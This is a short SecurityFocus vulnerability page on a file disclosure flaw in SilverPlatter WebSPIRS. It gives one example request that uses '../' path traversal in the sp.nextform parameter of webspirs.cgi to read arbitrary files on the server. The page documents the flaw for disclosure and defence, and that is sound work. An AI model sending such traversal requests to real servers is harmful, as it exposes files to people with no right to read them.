info
discussion
exploit
solution
references
SilverPlatter WebSPIRS File Disclosure Vulnerability
The following example has been provided by <cuctema@ok.ru>:
www.target.com/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../path/to/file
Privacy Statement
Copyright 2010, SecurityFocus